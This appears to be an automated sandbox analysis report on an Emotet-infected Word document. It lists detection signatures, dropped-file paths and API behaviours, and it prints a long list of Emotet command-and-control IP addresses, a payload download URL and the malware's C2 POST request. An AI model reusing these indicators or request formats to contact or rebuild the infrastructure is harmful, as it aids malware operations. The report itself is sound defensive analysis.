Analysis Report E_FUHKOEGDW.doc

Overview

General Information

Sample Name: E_FUHKOEGDW.doc
Analysis ID: 299648
MD5: 0c304d7a8532eb6741856f5164b25d79
SHA1: 6913192575a8be5e5fa7e561feffc23a66a690fa
SHA256: fa3c245c0bfe5a4b95d229481cbdac5dc3798f1948badeecb3dc692f589c5f7f

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://wiwildcare.org/wp-includes/Ri/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["208.180.207.205:80", "167.114.153.111:8080", "169.50.76.149:8080", "87.106.136.232:8080", "134.209.36.254:8080", "110.145.77.103:80", "61.19.246.238:443", "218.147.193.146:80", "194.4.58.192:7080", "123.176.25.234:80", "139.99.158.11:443", "174.106.122.139:80", "137.59.187.107:8080", "37.187.72.193:8080", "168.235.67.138:7080", "190.108.228.27:443", "139.59.60.244:8080", "184.180.181.202:80", "71.72.196.159:80", "47.144.21.12:443", "50.35.17.13:80", "103.86.49.11:8080", "47.36.140.164:80", "37.139.21.175:8080", "62.30.7.67:443", "139.162.60.124:8080", "104.131.11.150:443", "83.110.223.58:443", "74.208.45.104:8080", "50.91.114.38:80", "75.143.247.51:80", "209.54.13.14:80", "188.219.31.12:80", "194.187.133.160:443", "209.141.54.221:7080", "109.74.5.95:8080", "76.175.162.101:80", "96.245.227.43:80", "94.23.237.171:443", "118.83.154.64:443", "162.241.140.129:8080", "89.216.122.92:80", "5.196.74.210:8080", "121.7.31.214:80", "24.137.76.62:80", "76.171.227.238:80", "75.139.38.211:80", "5.39.91.110:7080", "71.15.245.148:8080", "94.200.114.161:80", "140.186.212.146:80", "62.75.141.82:80", "120.150.218.241:443", "203.153.216.189:7080", "124.41.215.226:80", "113.61.66.94:80", "139.162.108.71:8080", "79.98.24.39:8080", "69.206.132.149:80", "216.139.123.119:80", "74.214.230.200:80", "91.146.156.228:80", "97.82.79.83:80", "130.0.132.242:80", "5.196.108.189:8080", "176.111.60.55:8080", "172.104.97.173:8080", "78.24.219.147:8080", "61.33.119.226:443", "162.241.242.173:8080", "172.91.208.86:80", "68.252.26.78:80", "174.45.13.118:80", "85.25.106.204:8080", "157.245.99.39:8080", "185.94.252.104:443", "95.213.236.64:8080", "87.106.139.101:8080", "190.240.194.77:443", "93.147.212.206:80", "24.179.13.119:80", "120.150.60.189:80", "49.50.209.131:80", "104.131.123.136:443", "72.143.73.234:443", "91.211.88.52:7080", "121.124.124.40:7080", "220.245.198.194:80", "186.74.215.34:80", "78.188.106.53:443", "96.249.236.156:443", "46.105.131.79:8080", "79.137.83.50:443", "108.46.29.236:80", "181.126.74.180:80", "110.142.236.207:80", "80.241.255.202:8080", "208.180.207.205:80", "167.114.153.111:8080", "169.50.76.149:8080", "87.106.136.232:8080", "134.209.36.254:8080", "110.145.77.103:80", "61.19.246.238:443", "218.147.193.146:80", "194.4.58.192:7080", "123.176.25.234:80", "139.99.158.11:443", "174.106.122.139:80", "137.59.187.107:8080", "37.187.72.193:8080", "168.235.67.138:7080", "190.108.228.27:443", "139.59.60.244:8080", "184.180.181.202:80", "71.72.196.159:80", "47.144.21.12:443", "50.35.17.13:80", "103.86.49.11:8080", "47.36.140.164:80", "37.139.21.175:8080", "62.30.7.67:443", "139.162.60.124:8080", "104.131.11.150:443", "83.110.223.58:443", "74.208.45.104:8080", "50.91.114.38:80", "75.143.247.51:80", "209.54.13.14:80", "188.219.31.12:80", "194.187.133.160:443", "209.141.54.221:7080", "109.74.5.95:8080", "76.175.162.101:80", "96.245.227.43:80", "94.23.237.171:443", "118.83.154.64:443", "162.241.140.129:8080", "89.216.122.92:80", "5.196.74.210:8080", "12
Multi AV Scanner detection for domain / URL
Source: http://wiwildcare.org/wp-includes/Ri/ Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: E_FUHKOEGDW.doc Virustotal: Detection: 53% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: E_FUHKOEGDW.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.Ay8g9b.exe.3c0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.wfapigp.exe.600000.1.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_00602580
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602240 CryptDestroyHash,CryptGetHashParam,CryptExportKey,CryptEncrypt,memcpy,CryptDuplicateHash, 5_2_00602240
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00601FC0 CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,CryptVerifySignatureW, 5_2_00601FC0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C37E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW, 4_2_003C37E0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_006037E0 FindFirstFileW,FindFirstFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindNextFileW,FindNextFileW,FindClose, 5_2_006037E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wiwildcare.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 199.250.198.199:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 199.250.198.199:80

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1Host: wiwildcare.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.250.198.199 199.250.198.199
Source: Joe Sandbox View IP Address: 208.180.207.205 208.180.207.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SUDDENLINK-COMMUNICATIONSUS SUDDENLINK-COMMUNICATIONSUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /jTnDfr/P2mH/e2q7GgP0B4aetm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 208.180.207.205/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------CcYOzGtFE2User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.180.207.205Content-Length: 4468Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602930 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 5_2_00602930
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A04179F5-D643-47FF-B622-0CF30ED55516}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1Host: wiwildcare.orgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: wiwildcare.org
Source: unknown HTTP traffic detected: POST /jTnDfr/P2mH/e2q7GgP0B4aetm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 208.180.207.205/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------CcYOzGtFE2User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.180.207.205Content-Length: 4468Cache-Control: no-cache
Source: Ay8g9b.exe, 00000004.00000002.2099896126.0000000002610000.00000002.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343927965.00000000032B0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Ay8g9b.exe, 00000004.00000002.2099896126.0000000002610000.00000002.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343927965.00000000032B0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00405D73 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 4_2_00405D73

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099036668.00000000003C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2098998804.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2343025997.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2343195521.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099018567.0000000000324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.wfapigp.exe.600000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Ay8g9b.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_00602580

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and then click EnableContent
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and then click EnableContert
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5411
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File created: C:\Windows\SysWOW64\mfh264enc\ Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004200B6 4_2_004200B6
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041114C 4_2_0041114C
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00412221 4_2_00412221
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00421236 4_2_00421236
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004075CB 4_2_004075CB
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004205FA 4_2_004205FA
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411621 4_2_00411621
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004228E1 4_2_004228E1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004119F5 4_2_004119F5
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00415A1E 4_2_00415A1E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00420B3E 4_2_00420B3E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411E01 4_2_00411E01
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C81B0 4_2_003C81B0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7DD0 4_2_003C7DD0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C6500 4_2_003C6500
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7560 4_2_003C7560
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3AF0 4_2_003C3AF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3C10 4_2_003C3C10
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C1C90 4_2_003C1C90
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3DF0 4_2_003C3DF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3E17 4_2_003C3E17
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027382E 4_2_0027382E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027809E 4_2_0027809E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002790FE 4_2_002790FE
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027996E 4_2_0027996E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002759B5 4_2_002759B5
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027598E 4_2_0027598E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00279D4E 4_2_00279D4E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027568E 4_2_0027568E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002757AE 4_2_002757AE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_006081B0 5_2_006081B0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00607560 5_2_00607560
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00606500 5_2_00606500
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603C10 5_2_00603C10
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603E17 5_2_00603E17
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603AF0 5_2_00603AF0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603DF0 5_2_00603DF0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00607DD0 5_2_00607DD0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00601C90 5_2_00601C90
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030382E 5_2_0030382E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030809E 5_2_0030809E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030568E 5_2_0030568E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_003090FE 5_2_003090FE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030996E 5_2_0030996E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00309D4E 5_2_00309D4E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_003059B5 5_2_003059B5
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_003057AE 5_2_003057AE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030598E 5_2_0030598E
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: E_FUHKOEGDW.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Zm360615gr5, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: E_FUHKOEGDW.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe 24A1FF6CD8F455CA79F351CDAE937F2096A9BECF22D014ED351A43A03AEE835F
Found potential string decryption / allocating functions
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 00410BFE appears 82 times
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 00410DC0 appears 57 times
Yara signature match
Source: 00000005.00000002.2343302695.00000000008C0000.00000002.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Ay8g9b.exe, 00000004.00000002.2098998804.0000000000270000.00000040.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.sln
Source: Ay8g9b.exe, 00000004.00000002.2098998804.0000000000270000.00000040.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.slnPK
Source: classification engine Classification label: mal100.troj.evad.winDOC@5/8@1/2
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00604B60 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CloseHandle,CloseHandle, 5_2_00604B60
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00401060 LoadResource,LockResource,SizeofResource, 4_2_00401060
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C4F20 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap, 4_2_003C4F20
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$FUHKOEGDW.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC0A0.tmp Jump to behavior
Source: E_FUHKOEGDW.doc OLE indicator, Word Document stream: true
Source: E_FUHKOEGDW.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................E..j....................................}..v.....V......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................E..j..... ..............................}..v....`W......0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.... d......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......g.............................}..v.....d......0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....................................}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... ..............................}..v............0...............X.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7................4.j....p...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C................4.j....p...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O................4.j....p...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......s.l.3.,. .T.l.s."..."...........................}..v............0................Jg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[................4.j....@...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.5.6.............}..v............0................Jg.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E........................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
